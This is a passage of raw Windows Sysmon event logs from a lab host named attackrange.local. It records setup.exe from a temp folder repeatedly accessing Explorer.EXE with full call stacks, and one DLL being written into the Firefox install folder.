0ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll2021-01-18 13:59:52.114 10341000x800000000000000014163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 